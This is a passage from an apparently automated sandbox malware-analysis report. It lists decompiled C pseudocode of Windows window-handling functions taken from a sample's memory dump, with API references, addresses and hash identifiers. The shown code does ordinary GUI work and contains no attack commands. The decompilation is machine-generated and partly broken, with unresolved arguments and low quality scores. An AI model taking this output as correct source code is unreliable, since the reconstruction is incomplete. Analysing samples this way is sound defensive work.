						__eflags =  *(_v8 + 0xa0);
						if(__eflags != 0) {
							E004032D4(_v8, __eflags);
						}
					} else {
						__eflags = _t219 == 1;
						if(_t219 == 1) {
							__eflags =  *(_v8 + 0xa0);
							if(__eflags != 0) {
								E004032D4(_v8, __eflags);
							}
						} else {
							goto L41;
						}
					}
					goto L43;
				} else {
					if(_t263 == 0) {
						_t112 = _v8;
						_t228 =  *0x444d3c; // 0x1
						__eflags = _t228 - ( *(_t112 + 0x1c) &  *0x444d38);
						if(_t228 == ( *(_t112 + 0x1c) &  *0x444d38)) {
							_t115 = _v8;
							__eflags =  *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff;
							if( *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff < 0) {
								_t128 = _v8;
								__eflags =  *((char*)(_t128 + 0x22b)) - 2;
								if( *((char*)(_t128 + 0x22b)) != 2) {
									_t129 = __edx[2];
									_t26 = _t129 + 0x18;
									 *_t26 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t26;
								}
							}
							_t121 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
							__eflags = _t121;
							if(_t121 == 0) {
								L30:
								_t124 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
								__eflags = _t124;
								if(_t124 == 0) {
									L32:
									 *( *((intOrPtr*)(_t200 + 8)) + 0x18) =  *( *((intOrPtr*)(_t200 + 8)) + 0x18) | 0x00000001;
								} else {
									__eflags = _t124 == 3;
									if(_t124 == 3) {
										goto L32;
									}
								}
							} else {
								__eflags = _t121 == 2;
								if(_t121 == 2) {
									goto L30;
								}
							}
						}
						goto L43;
					} else {
						_t230 = _t218 + 0xfffffffa - 3;
						if(_t230 < 0) {
							__eflags =  *0x44dc20;
							if( *0x44dc20 != 0) {
								__eflags =  *__edx - 7;
								if( *__edx != 7) {
									goto L43;
								} else {
									_t130 = _v8;
									__eflags =  *(_t130 + 0x1c) & 0x00000010;
									if(( *(_t130 + 0x1c) & 0x00000010) != 0) {
										goto L43;
									} else {
										_t255 = 0;
										_t131 = _v8;
										__eflags =  *((char*)(_t131 + 0x22f)) - 2;
										if( *((char*)(_t131 + 0x22f)) != 2) {
											_t133 =  *(_v8 + 0x220);
											__eflags = _t133;
											if(_t133 != 0) {
												__eflags = _t133 - _v8;
												if(_t133 != _v8) {
													_t255 = E004325A4(_t133);
												}
											}
										} else {
											_t136 = E00445234(_v8);
											__eflags = _t136;
											if(_t136 != 0) {
												_t255 = E004325A4(E00445234(_v8));
											}
										}
										__eflags = _t255;
										if(_t255 == 0) {
											goto L43;
										} else {
											_t92 = SetFocus(_t255);
										}
									}
								}
							}
							goto L44;
						} else {
							_t231 = _t230 - 0x22;
							if(_t231 == 0) {
								_v24 = __edx[2];
								__eflags = _v24->i - 1;
								if(_v24->i != 1) {
									goto L43;
								} else {
									_t142 = _v8;
									__eflags =  *(_t142 + 0x248);
									if( *(_t142 + 0x248) == 0) {
										goto L43;
									} else {
										_t249 = E0043EA54( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
										__eflags = _t249;
										if(_t249 == 0) {
											goto L43;
										} else {
											_v16 = E0041C81C(0, 1);
											_push(_t258);
											_push(0x444b81);
											_push( *[fs:eax]);
											 *[fs:eax] = _t261;
											_v12 = SaveDC( *(_v24 + 0x18));
											_push(_t258);
											_push(0x444b64);
											_push( *[fs:eax]);
											 *[fs:eax] = _t261;
											E0041CDD8(_v16,  *(_v24 + 0x18));
											E0041CC78(_v16);
											E0043FF3C(_t249, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
											_pop(_t237);
											 *[fs:eax] = _t237;
											_push(0x444b6b);
											__eflags = 0;
											E0041CDD8(_v16, 0);
											return RestoreDC( *(_v24 + 0x18), _v12);
										}
									}
								}
							} else {
								if(_t231 == 1) {
									_t256 = __edx[2];
									__eflags = _t256->i - 1;
									if(_t256->i != 1) {
										goto L43;
									} else {
										_t172 = _v8;
										__eflags =  *(_t172 + 0x248);
										if( *(_t172 + 0x248) == 0) {
											goto L43;
										} else {
											_t250 = E0043EA54( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t256 + 8)));
											__eflags = _t250;
											if(_t250 == 0) {
												goto L43;
											} else {
												_t177 = E004325A4(_v8);
												L004063B8();
												_v20 = _t177;
												 *[fs:eax] = _t261;
												_v16 = E0041C81C(0, 1);
												 *[fs:eax] = _t261;
												_v12 = SaveDC(_v20);
												 *[fs:eax] = _t261;
												E0041CDD8(_v16, _v20);
												E0041CC78(_v16);
												 *((intOrPtr*)(_t250->i + 0x38))(_t256 + 0x10,  *[fs:eax], 0x444c6b, _t258,  *[fs:eax], 0x444c88, _t258,  *[fs:eax], 0x444caf, _t258, _t177);
												_pop(_t245);
												 *[fs:eax] = _t245;
												_push(0x444c72);
												__eflags = 0;
												E0041CDD8(_v16, 0);
												return RestoreDC(_v20, _v12);
											}
										}
									}
								} else {
									L41:
									_t267 = _t92 -  *0x44fbbc; // 0xc075
									if(_t267 == 0) {
										E0042D05C(_v8, 0, 0xb025, 0);
										E0042D05C(_v8, 0, 0xb024, 0);
										E0042D05C(_v8, 0, 0xb035, 0);
										E0042D05C(_v8, 0, 0xb009, 0);
										E0042D05C(_v8, 0, 0xb008, 0);
										E0042D05C(_v8, 0, 0xb03d, 0);
									}
									L43:
									_t92 = E0042FFB8(_v8, _t200);
									L44:
									return _t92;
								}
							}
						}
					}
				}
			}








































                                  0x00444909
                                  0x0044490b
                                  0x00444911
                                  0x00444913
                                  0x00444916
                                  0x00444918
                                  0x0044491a
                                  0x0044491d
                                  0x00444942
                                  0x00444942
                                  0x00444948
                                  0x004449f4
                                  0x004449fb
                                  0x00444a08
                                  0x00444a08
                                  0x0044494e
                                  0x0044494e
                                  0x0044494f
                                  0x004449d3
                                  0x004449da
                                  0x004449e7
                                  0x004449e7
                                  0x00444951
                                  0x00000000
                                  0x00444951
                                  0x0044494f
                                  0x00000000
                                  0x0044491f
                                  0x0044491f
                                  0x00444a12
                                  0x00444a20
                                  0x00444a27
                                  0x00444a2a
                                  0x00444a30
                                  0x00444a3a
                                  0x00444a3c
                                  0x00444a3e
                                  0x00444a41
                                  0x00444a48
                                  0x00444a4a
                                  0x00444a4d
                                  0x00444a4d
                                  0x00444a4d
                                  0x00444a4d
                                  0x00444a48
                                  0x00444a5a
                                  0x00444a5a
                                  0x00444a5c
                                  0x00444a66
                                  0x00444a6f
                                  0x00444a6f
                                  0x00444a71
                                  0x00444a7b
                                  0x00444a7e
                                  0x00444a73
                                  0x00444a73
                                  0x00444a75
                                  0x00000000
                                  0x00000000
                                  0x00444a75
                                  0x00444a5e
                                  0x00444a5e
                                  0x00444a60
                                  0x00000000
                                  0x00000000
                                  0x00444a60
                                  0x00444a5c
                                  0x00000000
                                  0x00444925
                                  0x00444928
                                  0x0044492b
                                  0x00444956
                                  0x0044495d
                                  0x00444963
                                  0x00444966
                                  0x00000000
                                  0x0044496c
                                  0x0044496c
                                  0x0044496f
                                  0x00444973
                                  0x00000000
                                  0x00444979
                                  0x00444979
                                  0x0044497b
                                  0x0044497e
                                  0x00444985
                                  0x004449a7
                                  0x004449ad
                                  0x004449af
                                  0x004449b1
                                  0x004449b4
                                  0x004449bb
                                  0x004449bb
                                  0x004449b4
                                  0x00444987
                                  0x0044498a
                                  0x0044498f
                                  0x00444991
                                  0x004449a0
                                  0x004449a0
                                  0x00444991
                                  0x004449bd
                                  0x004449bf
                                  0x00000000
                                  0x004449c5
                                  0x004449c6
                                  0x004449c6
                                  0x004449bf
                                  0x00444973
                                  0x00444966
                                  0x00000000
                                  0x0044492d
                                  0x0044492d
                                  0x00444930
                                  0x00444a8a
                                  0x00444a90
                                  0x00444a93
                                  0x00000000
                                  0x00444a99
                                  0x00444a99
                                  0x00444a9c
                                  0x00444aa3
                                  0x00000000
                                  0x00444aa9
                                  0x00444abf
                                  0x00444ac1
                                  0x00444ac3
                                  0x00000000
                                  0x00444ac9
                                  0x00444ad5
                                  0x00444ada
                                  0x00444adb
                                  0x00444ae0
                                  0x00444ae3
                                  0x00444af2
                                  0x00444af7
                                  0x00444af8
                                  0x00444afd
                                  0x00444b00
                                  0x00444b0c
                                  0x00444b1f
                                  0x00444b37
                                  0x00444b3e
                                  0x00444b41
                                  0x00444b44
                                  0x00444b49
                                  0x00444b4e
                                  0x00444b63
                                  0x00444b63
                                  0x00444ac3
                                  0x00444aa3
                                  0x00444936
                                  0x00444937
                                  0x00444b88
                                  0x00444b8b
                                  0x00444b8e
                                  0x00000000
                                  0x00444b94
                                  0x00444b94
                                  0x00444b97
                                  0x00444b9e
                                  0x00000000
                                  0x00444ba4
                                  0x00444bb7
                                  0x00444bb9
                                  0x00444bbb
                                  0x00000000
                                  0x00444bc1
                                  0x00444bc4
                                  0x00444bca
                                  0x00444bcf
                                  0x00444bdd
                                  0x00444bec
                                  0x00444bfa
                                  0x00444c06
                                  0x00444c14
                                  0x00444c1d
                                  0x00444c30
                                  0x00444c43
                                  0x00444c48
                                  0x00444c4b
                                  0x00444c4e
                                  0x00444c53
                                  0x00444c58
                                  0x00444c6a
                                  0x00444c6a
                                  0x00444bbb
                                  0x00444b9e
                                  0x0044493d
                                  0x00444cb6
                                  0x00444cb6
                                  0x00444cbc
                                  0x00444cca
                                  0x00444cdb
                                  0x00444cec
                                  0x00444cfd
                                  0x00444d0e
                                  0x00444d1f
                                  0x00444d1f
                                  0x00444d24
                                  0x00444d29
                                  0x00444d2e
                                  0x00444d34
                                  0x00444d34
                                  0x00444937
                                  0x00444930
                                  0x0044492b
                                  0x0044491f

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: RestoreSave$B080Focus
                                  • String ID:
                                  • API String ID: 809140284-0
                                  • Opcode ID: b33b7901b6c396f12b9274cfb80f8c264102b3c2f5ff2af294e2e7d863c3a2e2
                                  • Instruction ID: f378d728db1ab41e274521347eeb280acbbda347318d29fea8bef968548ade7c
                                  • Opcode Fuzzy Hash: b33b7901b6c396f12b9274cfb80f8c264102b3c2f5ff2af294e2e7d863c3a2e2
                                  • Instruction Fuzzy Hash: E0B19F74A00148DFEB10DF69D996BAEB7F5FB89304F6540A6E804A7761C738EE01DB18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044AC68, Relevance: 9.1, APIs: 6, Instructions: 86windownativeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E0044AC68(void* __eax) {
				struct HWND__* _t21;
				intOrPtr* _t26;
				signed int _t29;
				intOrPtr* _t30;
				int _t33;
				intOrPtr _t36;
				void* _t51;
				int _t60;

				_t51 = __eax;
				_t21 = IsIconic( *(__eax + 0x30));
				if(_t21 != 0) {
					SetActiveWindow( *(_t51 + 0x30));
					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
						L6:
						E00449BD0( *(_t51 + 0x30), 9, __eflags);
					} else {
						_t60 = IsWindowEnabled(E004325A4( *((intOrPtr*)(_t51 + 0x44))));
						if(_t60 == 0) {
							goto L6;
						} else {
							_push(0);
							_push(0xf120);
							_push(0x112);
							_push( *(_t51 + 0x30));
							L004061D0();
						}
					}
					_t26 =  *0x44de70; // 0x44f8f8
					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					_t30 =  *0x44de70; // 0x44f8f8
					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
					_t36 =  *((intOrPtr*)(_t51 + 0x44));
					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
						E004458DC(_t36, 0);
						E00447CF8( *((intOrPtr*)(_t51 + 0x44)));
					}
					E0044A2B0(_t51);
					_t21 =  *0x44fbb4; // 0x2191320
					_t55 =  *((intOrPtr*)(_t21 + 0x64));
					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
						_t21 = SetFocus(E004325A4(_t55));
					}
					if( *((short*)(_t51 + 0x122)) != 0) {
						return  *((intOrPtr*)(_t51 + 0x120))();
					}
				}
				return _t21;
			}











                                  0x0044ac6a
                                  0x0044ac70
                                  0x0044ac77
                                  0x0044ac81
                                  0x0044ac8a
                                  0x0044acc4
                                  0x0044accc
                                  0x0044ac9b
                                  0x0044aca9
                                  0x0044acab
                                  0x00000000
                                  0x0044acad
                                  0x0044acad
                                  0x0044acaf
                                  0x0044acb4
                                  0x0044acbc
                                  0x0044acbd
                                  0x0044acbd
                                  0x0044acab
                                  0x0044acd9
                                  0x0044ace2
                                  0x0044ace4
                                  0x0044ace6
                                  0x0044ace6
                                  0x0044acec
                                  0x0044acf5
                                  0x0044acf7
                                  0x0044acf9
                                  0x0044acf9
                                  0x0044ad03
                                  0x0044ad08
                                  0x0044ad0d
                                  0x0044ad20
                                  0x0044ad28
                                  0x0044ad28
                                  0x0044ad2f
                                  0x0044ad34
                                  0x0044ad39
                                  0x0044ad3e
                                  0x0044ad48
                                  0x0044ad48
                                  0x0044ad55
                                  0x00000000
                                  0x0044ad5f
                                  0x0044ad55
                                  0x0044ad67

                                  APIs
                                  • IsIconic.USER32 ref: 0044AC70
                                  • SetActiveWindow.USER32(?,?,?,?,0044A691,00000000,0044AB52), ref: 0044AC81
                                  • IsWindowEnabled.USER32(00000000), ref: 0044ACA4
                                  • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,0044A691,00000000,0044AB52), ref: 0044ACBD
                                  • SetWindowPos.USER32(?,00000000,00000000,?,?,0044A691,00000000,0044AB52), ref: 0044AD03
                                  • SetFocus.USER32(00000000,?,00000000,00000000,?,?,0044A691,00000000,0044AB52), ref: 0044AD48
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                                  • String ID:
                                  • API String ID: 3996302123-0
                                  • Opcode ID: 04f9d94acc95820c77cfe80cd65695e7a1f65696e3038dc1ad9939f2c357f9d1
                                  • Instruction ID: 6fce2c5c009cfae2de7fdbebd0da26fe2b420eeb0e7ac9a1dea383e0f4c0860f
                                  • Opcode Fuzzy Hash: 04f9d94acc95820c77cfe80cd65695e7a1f65696e3038dc1ad9939f2c357f9d1
                                  • Instruction Fuzzy Hash: 19311E71B40200ABFB51AB69CDC6B563799AB04709F0800A6FA019F2D7CA7DEC648719
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00431F90, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E00431F90(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
				void* _v20;
				struct _WINDOWPLACEMENT _v48;
				char _v64;
				void* _t31;
				int _t45;
				int _t51;
				void* _t52;
				int _t56;
				int _t58;

				_t56 = __ecx;
				_t58 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
					L4:
					if(E00432804(_t52) == 0) {
						L7:
						 *(_t52 + 0x40) = _t58;
						 *(_t52 + 0x44) = _t56;
						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
						_t31 = E00432804(_t52);
						__eflags = _t31;
						if(_t31 != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
							E0042B890(_t52,  &_v64);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
						}
						L9:
						E0042B544(_t52);
						return E004032D4(_t52, _t66);
					}
					_t45 = IsIconic( *(_t52 + 0x180));
					_t66 = _t45;
					if(_t45 != 0) {
						goto L7;
					}
					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
					goto L9;
				} else {
					_t51 = _a4;
					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
						return _t51;
					}
					goto L4;
				}
			}












                                  0x00431f99
                                  0x00431f9b
                                  0x00431f9d
                                  0x00431fa2
                                  0x00431fbd
                                  0x00431fc6
                                  0x00431ff4
                                  0x00431ff4
                                  0x00431ff7
                                  0x00431ffd
                                  0x00432003
                                  0x00432008
                                  0x0043200d
                                  0x0043200f
                                  0x00432011
                                  0x00432023
                                  0x0043202d
                                  0x00432038
                                  0x00432039
                                  0x0043203a
                                  0x0043203b
                                  0x00432047
                                  0x00432047
                                  0x0043204c
                                  0x0043204e
                                  0x00000000
                                  0x00432059
                                  0x00431fcf
                                  0x00431fd4
                                  0x00431fd6
                                  0x00000000
                                  0x00000000
                                  0x00431fed
                                  0x00000000
                                  0x00431fb1
                                  0x00431fb1
                                  0x00431fb7
                                  0x00432064
                                  0x00432064
                                  0x00000000
                                  0x00431fb7

                                  APIs
                                  • IsIconic.USER32 ref: 00431FCF
                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00431FED
                                  • GetWindowPlacement.USER32(?,0000002C), ref: 00432023
                                  • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00432047
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Window$Placement$Iconic
                                  • String ID: ,
                                  • API String ID: 568898626-3772416878
                                  • Opcode ID: 6ea5098ae64c727d8633ee1d30b1b81a5ca1550685644228db56473b82a88785
                                  • Instruction ID: 0fcba62f2c5ed777ea4e8eb1159d25ab0cb335bd59b500823ecde4fb1fc55c80
                                  • Opcode Fuzzy Hash: 6ea5098ae64c727d8633ee1d30b1b81a5ca1550685644228db56473b82a88785
                                  • Instruction Fuzzy Hash: 55215131600204ABCF54EE69C8C09DA77A8AF08314F14906AFE18EF356D779ED04CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044ABB8, Relevance: 7.6, APIs: 5, Instructions: 59nativewindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E0044ABB8(void* __eax) {
				int _t21;
				struct HWND__* _t36;
				void* _t40;

				_t40 = __eax;
				_t1 = _t40 + 0x30; // 0x0
				_t21 = IsIconic( *_t1);
				if(_t21 == 0) {
					E0044A2A0();
					_t2 = _t40 + 0x30; // 0x0
					SetActiveWindow( *_t2);
					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E004325A4( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
						_t15 = _t40 + 0x30; // 0x0
						_t21 = E00449BD0( *_t15, 6, __eflags);
					} else {
						_t43 =  *((intOrPtr*)(_t40 + 0x44));
						_t36 = E004325A4( *((intOrPtr*)(_t40 + 0x44)));
						_t13 = _t40 + 0x30; // 0x0
						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
						_push(0);
						_push(0xf020);
						_push(0x112);
						_t14 = _t40 + 0x30; // 0x0
						_t21 =  *_t14;
						_push(_t21);
						L004061D0();
					}
					if( *((short*)(_t40 + 0x11a)) != 0) {
						return  *((intOrPtr*)(_t40 + 0x118))();
					}
				}
				return _t21;
			}






                                  0x0044abba
                                  0x0044abbc
                                  0x0044abc0
                                  0x0044abc7
                                  0x0044abcf
                                  0x0044abd4
                                  0x0044abd8
                                  0x0044abe1
                                  0x0044ac45
                                  0x0044ac48
                                  0x0044ac04
                                  0x0044ac08
                                  0x0044ac1a
                                  0x0044ac20
                                  0x0044ac24
                                  0x0044ac29
                                  0x0044ac2b
                                  0x0044ac30
                                  0x0044ac35
                                  0x0044ac35
                                  0x0044ac38
                                  0x0044ac39
                                  0x0044ac39
                                  0x0044ac55
                                  0x00000000
                                  0x0044ac5f
                                  0x0044ac55
                                  0x0044ac67

                                  APIs
                                  • IsIconic.USER32 ref: 0044ABC0
                                  • SetActiveWindow.USER32(00000000,00000000,?,?,0044B1E4), ref: 0044ABD8
                                  • IsWindowEnabled.USER32(00000000), ref: 0044ABFB
                                  • SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000,?,?,0044B1E4), ref: 0044AC24
                                  • NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000), ref: 0044AC39
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Window$ActiveEnabledIconicNtdllProc_
                                  • String ID:
                                  • API String ID: 1720852555-0
                                  • Opcode ID: a9467dd3da0ad9118170fbd8614bdaf792fcca640980f35251a04851ee30ca1d
                                  • Instruction ID: 1b234e7820c650b01842e1b7f681ca0f5447ade2616a200a1d58a18682deaf25
                                  • Opcode Fuzzy Hash: a9467dd3da0ad9118170fbd8614bdaf792fcca640980f35251a04851ee30ca1d
                                  • Instruction Fuzzy Hash: AC11D071640200ABEB54EE69C9C6B5737A8AF08705F4810AABA05DF28BD679EC508759
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00421D38, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E00421D38(void* __edi, struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t19;
				intOrPtr _t21;
				struct HWND__* _t23;

				_t19 = _a8;
				_t23 = _a4;
				if( *0x44f921 != 0) {
					if((_t19 & 0x00000003) == 0) {
						if(IsIconic(_t23) == 0) {
							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
						} else {
							GetWindowPlacement(_t23,  &_v48);
						}
						return E00421CA8( &(_v48.rcNormalPosition), _t19);
					}
					return 0x12340042;
				}
				_t21 =  *0x44f8fc; // 0x421d38
				 *0x44f8fc = E00421B38(1, _t19, _t21, __edi, _t23);
				return  *0x44f8fc(_t23, _t19);
			}










                                  0x00421d40
                                  0x00421d43
                                  0x00421d4d
                                  0x00421d77
                                  0x00421d88
                                  0x00421d9b
                                  0x00421d8a
                                  0x00421d8f
                                  0x00421d8f
                                  0x00000000
                                  0x00421da5
                                  0x00000000
                                  0x00421d79
                                  0x00421d54
                                  0x00421d61
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: AddressProc
                                  • String ID: MonitorFromWindow
                                  • API String ID: 190572456-2842599566
                                  • Opcode ID: ffe34b32266510e4eb13a92d87f26274046214b1792b5f0142226068db352507
                                  • Instruction ID: 5a13d5d92fd05d4ddd454ef09ebdc29ba10ae0d0995a427b4100288980ae5fd8
                                  • Opcode Fuzzy Hash: ffe34b32266510e4eb13a92d87f26274046214b1792b5f0142226068db352507
                                  • Instruction Fuzzy Hash: 3B018F75A14528AA8700EB91AC419EB735C9A26354BD04137F81196261D738AA1647FE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00426D20, Relevance: 6.0, APIs: 4, Instructions: 46sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00426D20(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				CHAR* _t20;
				long _t25;
				intOrPtr _t30;
				void* _t34;
				intOrPtr _t37;

				_push(0);
				_t34 = __eax;
				_push(_t37);
				_push(0x426d9d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t37;
				E00426780(__eax);
				_t25 = GetTickCount();
				do {
					Sleep(0);
				} while (GetTickCount() - _t25 <= 0x3e8);
				E00426380(_t34, _t25,  &_v8, 0, __edi, _t34);
				if(_v8 != 0) {
					_t20 = E004042D0(_v8);
					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
				}
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(0x426da4);
				return E00403E10( &_v8);
			}









                                  0x00426d23
                                  0x00426d27
                                  0x00426d2b
                                  0x00426d2c
                                  0x00426d31
                                  0x00426d34
                                  0x00426d39
                                  0x00426d43
                                  0x00426d45
                                  0x00426d47
                                  0x00426d53
                                  0x00426d61
                                  0x00426d6a
                                  0x00426d73
                                  0x00426d82
                                  0x00426d82
                                  0x00426d89
                                  0x00426d8c
                                  0x00426d8f
                                  0x00426d9c

                                  APIs
                                    • Part of subcall function 00426780: WinHelpA.USER32 ref: 0042678F
                                  • GetTickCount.KERNEL32 ref: 00426D3E
                                  • Sleep.KERNEL32(00000000,00000000,00426D9D,?,?,00000000,00000000,?,00426D16), ref: 00426D47
                                  • GetTickCount.KERNEL32 ref: 00426D4C
                                  • WinHelpA.USER32 ref: 00426D82
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CountHelpTick$Sleep
                                  • String ID:
                                  • API String ID: 2438605093-0
                                  • Opcode ID: 587f2c0c6e59002c0f7499b2ea588dfd76fd36732663674fd5b1939995064e7e
                                  • Instruction ID: 71060c31abd0f42595f3aa66d6ec0fb605a907abc284c34ce0954d9a730eca06
                                  • Opcode Fuzzy Hash: 587f2c0c6e59002c0f7499b2ea588dfd76fd36732663674fd5b1939995064e7e
                                  • Instruction Fuzzy Hash: 3101A230700618AFE311EBB6DC46B5E73A8DB48704FE2457BF404A62D1DA7C6E008559
